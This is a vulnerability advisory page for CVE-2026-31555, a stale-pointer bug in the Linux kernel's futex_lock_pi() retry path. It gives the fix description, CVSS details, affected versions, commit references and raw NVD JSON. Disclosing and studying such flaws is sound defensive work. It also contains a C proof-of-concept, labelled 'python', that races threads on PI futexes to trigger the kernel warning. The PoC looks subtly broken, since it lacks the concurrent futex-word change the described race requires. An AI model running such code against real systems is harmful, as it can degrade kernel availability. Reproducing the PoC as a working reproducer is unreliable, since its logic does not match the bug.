CVE-2026-31555

Description

In the Linux kernel, the following vulnerability has been resolved: futex: Clear stale exiting pointer in futex_lock_pi() retry path Fuzzying/stressing futexes triggered: WARNING: kernel/futex/core.c:825 at wait_for_owner_exiting+0x7a/0x80, CPU#11: futex_lock_pi_s/524 When futex_lock_pi_atomic() sees the owner is exiting, it returns -EBUSY and stores a refcounted task pointer in 'exiting'. After wait_for_owner_exiting() consumes that reference, the local pointer is never reset to nil. Upon a retry, if futex_lock_pi_atomic() returns a different error, the bogus pointer is passed to wait_for_owner_exiting(). CPU0 CPU1 CPU2 futex_lock_pi(uaddr) // acquires the PI futex exit() futex_cleanup_begin() futex_state = EXITING; futex_lock_pi(uaddr) futex_lock_pi_atomic() attach_to_pi_owner() // observes EXITING *exiting = owner; // takes ref return -EBUSY wait_for_owner_exiting(-EBUSY, owner) put_task_struct(); // drops ref // exiting still points to owner goto retry; futex_lock_pi_atomic() lock_pi_update_atomic() cmpxchg(uaddr) *uaddr ^= WAITERS // whatever // value changed return -EAGAIN; wait_for_owner_exiting(-EAGAIN, exiting) // stale WARN_ON_ONCE(exiting) Fix this by resetting upon retry, essentially aligning it with requeue_pi.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel (修复提交 210d36d892de 之前版本)

Linux Kernel (修复提交 33095ae3bdd 之前版本)

Linux Kernel (修复提交 5e8e06bf890 之前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-31555
 * This code attempts to trigger the race condition in futex_lock_pi.
 * Compile: gcc -o poc CVE-2026-31555.c -lpthread
 */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <linux/futex.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>

// Futex syscall wrapper
int futex(int *uaddr, int futex_op, int val, 
          const struct timespec *timeout, int *uaddr2, int val3) {
    return syscall(SYS_futex, uaddr, futex_op, val, timeout, uaddr2, val3);
}

int futex_addr = 0;

void *owner_thread(void *arg) {
    // Thread acquires the lock and exits immediately
    // This simulates the 'exit()' race condition
    futex(&futex_addr, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
    return NULL;
}

void *attacker_thread(void *arg) {
    // Thread tries to lock the futex, potentially hitting the retry path
    // where the stale pointer bug occurs
    while (1) {
        int res = futex(&futex_addr, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
        if (res == 0) {
            futex(&futex_addr, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
        }
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;
    
    printf("Starting PoC for CVE-2026-31555...\n");
    printf("Check dmesg for WARN_ON_ONCE in futex_lock_pi.\n");

    // Create threads to race on the futex
    for (int i = 0; i < 1000; i++) {
        futex_addr = 0; // Reset futex state
        pthread_create(&t1, NULL, owner_thread, NULL);
        pthread_create(&t2, NULL, attacker_thread, NULL);
        
        pthread_join(t1, NULL);
        // Give attacker thread some time or cancel it
        pthread_cancel(t2);
        pthread_join(t2, NULL);
    }

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31555
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31555
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31555/
[4] VulDB https://vuldb.com/cve/CVE-2026-31555
[5] https://git.kernel.org/stable/c/210d36d892de5195e6766c45519dfb1e65f3eb83
[6] https://git.kernel.org/stable/c/33095ae3bdde5e5c264d7e88a2f3e7703a26c7aa
[7] https://git.kernel.org/stable/c/5e8e06bf8909e79b4acd950cf578cfc2f10bbefa
[8] https://git.kernel.org/stable/c/71112e62807d1925dc3ae6188b11f8cfc85aec23
[9] https://git.kernel.org/stable/c/7475dfad10a05a5bfadebf5f2499bd61b19ed293
[10] https://git.kernel.org/stable/c/92e47ad03e03dbb5515bdf06444bf6b1e147310d
[11] https://git.kernel.org/stable/c/de7c0c04ad868f2cee6671b11c0a6d20421af1da
[12] https://git.kernel.org/stable/c/e7824ec168d2ac883a213cd1f4d6cc0816002a85

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31555", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:29.837", "lastModified": "2026-04-27T20:14:27.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfutex: Clear stale exiting pointer in futex_lock_pi() retry path\n\nFuzzying/stressing futexes triggered:\n\n WARNING: kernel/futex/core.c:825 at wait_for_owner_exiting+0x7a/0x80, CPU#11: futex_lock_pi_s/524\n\nWhen futex_lock_pi_atomic() sees the owner is exiting, it returns -EBUSY\nand stores a refcounted task pointer in 'exiting'.\n\nAfter wait_for_owner_exiting() consumes that reference, the local pointer\nis never reset to nil. Upon a retry, if futex_lock_pi_atomic() returns a\ndifferent error, the bogus pointer is passed to wait_for_owner_exiting().\n\n CPU0\t\t\t CPU1\t\t CPU2\n futex_lock_pi(uaddr)\n // acquires the PI futex\n exit()\n futex_cleanup_begin()\n futex_state = EXITING;\n\t\t\t futex_lock_pi(uaddr)\n\t\t\t futex_lock_pi_atomic()\n\t\t\t\t attach_to_pi_owner()\n\t\t\t\t // observes EXITING\n\t\t\t\t *exiting = owner; // takes ref\n\t\t\t\t return -EBUSY\n\t\t\t wait_for_owner_exiting(-EBUSY, owner)\n\t\t\t\t put_task_struct(); // drops ref\n\t\t\t // exiting still points to owner\n\t\t\t goto retry;\n\t\t\t futex_lock_pi_atomic()\n\t\t\t\t lock_pi_update_atomic()\n\t\t\t\t cmpxchg(uaddr)\n\t\t\t\t\t*uaddr ^= WAITERS // whatever\n\t\t\t\t // value changed\n\t\t\t\t return -EAGAIN;\n\t\t\t wait_for_owner_exiting(-EAGAIN, exiting) // stale\n\t\t\t\t WARN_ON_ONCE(exiting)\n\nFix this by resetting upon retry, essentially aligning it with requeue_pi."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.255", "versionEndExcluding": "4.5", "matchCriteriaId": "39A57944-7654-4465-9F2B-4DC1CB18ADFB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9.255", "versionEndExcluding": "4.10", "matchCriteriaId": "F932A542-7872-4F86-AD1E-00CCC240C25D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.158", "versionEndExcluding": "4.15", "matchCriteriaId": "C62F59A2-9EFC-4E7F-B9E7-3DFF4E885406"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.19.172", "versionEndExcluding": "4.20", "matchCriteriaId": "235BE773-4E0B-4AD6-9314-D176A65C4B73"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.1", "versionEndExcluding": "5.5", "matchCriteriaId": "025DC0BA-08A8-4703-AE9F-7C3D8E346A45"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "45E871E1-B00E-4E88-83A3-60B38EAF2B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.131", "matchCriteriaId": "CE6ED4D4-0046-4573-BFA9-D64143B6A89F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": tru ... (truncated)